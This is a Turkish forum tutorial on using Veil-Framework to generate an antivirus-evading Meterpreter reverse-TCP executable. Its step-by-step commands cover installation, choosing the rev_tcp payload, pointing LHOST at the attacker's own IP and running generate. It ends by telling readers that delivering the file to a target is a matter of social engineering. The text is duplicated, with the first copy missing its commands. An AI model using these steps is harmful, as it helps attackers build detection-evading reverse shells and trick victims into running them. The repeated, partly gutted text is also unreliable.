VEİL-FRAMEWORK
Sızma testleri sırasında antivirüslerin atlatılarak hedef sistemin ele geçirilmesi kritik bir aşamadır Bu durumda sistem test edilirken antivirüs yazılımlarının atlatılması gerekmektedir. Bu noktada açık kaynak kodlu olarak geliştirilen Veil-Framework devreye girmektedir.
KURULUM
Öncelikle Kali Linuxa Veil-Framework nasıl yüklenir videoda gösterdiğim şekilde anlatayım.
Kali linuxta terminali açıyoruz aynı zamanda arama sayfasına ''Veil framework github'' yazıp
https://github.com/Veil-Framework/Veil
Veil-Framework sitesine erişeğiz. Zaten ayrıntılı bir şekilde nasıl yüklendiği konusunda komutları ile birlikte yer veriyor terminale ilk önce bu komutu yazacağız.
ben videoda opt klasörüne kurdum siz de kendi belirlediğiniz bir klasöre yükleme yapabilirsiniz.Terminale aşağıdaki komutu yazarak opt klasörüne geliceğiz
Eğer ''git''komutu sizin kali linuxa tanımlı değilse aşağıdaki komutu giricez
daha sonra sırasıyla aşağıdaki komutları giriceğiz
ortalama 15-20 dakika içinde Veil-Framework yüklenecek. Kurulum bitikten sonra aşağıdaki komutu yazıp Veil.py klasörüne ulaşacağız. Daha sonra aşağıdaki komutu yazıp Veil framework'un ara yüzüne ulaşacağız
Evasion sayfasında görüceğiniz üzere 41 tane payload karşımıza çıkıcak, 41 payload'ın anlamı 41 farklı kullanabileceğimiz kodlardır. Aşağıdaki komutu girdiğimiz zaman 41 tane payloadı karşımıza çıkaracak
Burda değiştirmemiz gerek bir önemli yer var LHOST özelliğini düzeltmemiz lazım LHOST bizim kendi ip adresimiz olmalı .aşağıdaki komutu yazarak ip adresimizi payloada tanımlıyacağız ve tanımladıktan sonra
Kodumuzu kaydetmek için aşağıda ki komutu yazıp enter'a basacağız
ve payload hazır hale geldi ve bize payload'ın kaydetiği bölgeyi gösterecek
/var/lib/veil/output/compiled/dosya.exe
bundan sonra bu payloadı yedirmek sizin sosyal mühendisliğinize kalmıştır forumda bununla ilgili epey içerik var gözatabilirsiniz...
VİDEOYU BURDAN İZLİYEBİLİRSİNİZ...
Sızma testleri sırasında antivirüslerin atlatılarak hedef sistemin ele geçirilmesi kritik bir aşamadır Bu durumda sistem test edilirken antivirüs yazılımlarının atlatılması gerekmektedir. Bu noktada açık kaynak kodlu olarak geliştirilen Veil-Framework devreye girmektedir.
KURULUM
Öncelikle Kali Linuxa Veil-Framework nasıl yüklenir videoda gösterdiğim şekilde anlatayım.
Kali linuxta terminali açıyoruz aynı zamanda arama sayfasına ''Veil framework github'' yazıp
https://github.com/Veil-Framework/Veil
Veil-Framework sitesine erişeğiz. Zaten ayrıntılı bir şekilde nasıl yüklendiği konusunda komutları ile birlikte yer veriyor terminale ilk önce bu komutu yazacağız.
apt -y install veil
ben videoda opt klasörüne kurdum siz de kendi belirlediğiniz bir klasöre yükleme yapabilirsiniz.Terminale aşağıdaki komutu yazarak opt klasörüne geliceğiz
cd /opt
Eğer ''git''komutu sizin kali linuxa tanımlı değilse aşağıdaki komutu giricez
sudo apt-get -y install git
daha sonra sırasıyla aşağıdaki komutları giriceğiz
ortalama 15-20 dakika içinde Veil-Framework yüklenecek. Kurulum bitikten sonra aşağıdaki komutu yazıp Veil.py klasörüne ulaşacağız. Daha sonra aşağıdaki komutu yazıp Veil framework'un ara yüzüne ulaşacağız
python3 Veil.py
karşımıza 2 araç çıkıcak
1) Evasion
2) Ordnance
ve biz 1. kullanacağız. Aşağıdaki komutu yazıp evasion aracına ulaşıcağız2) Ordnance
use 1
Evasion sayfasında görüceğiniz üzere 41 tane payload karşımıza çıkıcak, 41 payload'ın anlamı 41 farklı kullanabileceğimiz kodlardır. Aşağıdaki komutu girdiğimiz zaman 41 tane payloadı karşımıza çıkaracak
list
Ben videoda 7. olan payloadı tercih ettim c/meterpreter/rev_tcp.py ve aşağıdaki komutu yazarak payload edeceğimiz framework'e geliriz
use 7
Burda değiştirmemiz gerek bir önemli yer var LHOST özelliğini düzeltmemiz lazım LHOST bizim kendi ip adresimiz olmalı .aşağıdaki komutu yazarak ip adresimizi payloada tanımlıyacağız ve tanımladıktan sonra
set LHOST ip adresiniz
ve tanımladıktan sonra aşağıdaki komutu yazarak LHOST kısmına gözatıp doğruluyacağız
show options
Kodumuzu kaydetmek için aşağıda ki komutu yazıp enter'a basacağız
generate
ve payload hazır hale geldi ve bize payload'ın kaydetiği bölgeyi gösterecek
/var/lib/veil/output/compiled/dosya.exe
bundan sonra bu payloadı yedirmek sizin sosyal mühendisliğinize kalmıştır forumda bununla ilgili epey içerik var gözatabilirsiniz...
VİDEOYU BURDAN İZLİYEBİLİRSİNİZ...
Son düzenleme: